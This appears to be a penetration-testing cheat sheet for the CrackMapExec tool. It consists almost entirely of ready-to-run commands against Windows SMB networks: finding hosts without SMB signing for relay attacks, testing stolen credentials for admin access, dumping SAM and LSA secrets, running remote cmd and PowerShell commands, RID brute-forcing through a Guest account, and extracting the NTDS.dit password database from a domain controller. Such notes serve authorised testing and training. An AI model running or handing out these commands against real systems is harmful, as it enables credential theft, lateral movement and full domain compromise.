CrackMapExec
Find ip/hostname/SMB Signinig/etc:
crackmapexec smb targets.txt
Generate a list of SMB Signing disabled for relays
crackmapexec smb targets.txt --gen-relay-list relay.txt
Find hosts user can log into/is admin on
crackmapexec smb targets.txt -u user -p 'password'
Enumerate shares
crackmapexec smb ip -u user -p 'password' --shares
Dump SAM
crackmapexec smb ip -u user -p 'password' --sam
Dump LSA
crackmapexec smb ip -u user -p 'password' --lsa
Pass cmd
crackmapexec smb ip -u user -p 'password' -x 'command'
Pass powershell
crackmapexec smb ip -u user -p 'password' -X 'command'
List users if Guest account is enabled
crackmapexec smb (ip) -u 'Guest' -p '' --rid-brute
Look at domain admins
crackmapexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'
Look at logged on users
crackmapexec smb ip -u user -p 'password' --loggedon-users
Look at NTDS.dit - is LOUD - USE WITH CAUTION
crackmapexec smb dc-ip -u domain-admin-user -p 'password' --ntds
Last updated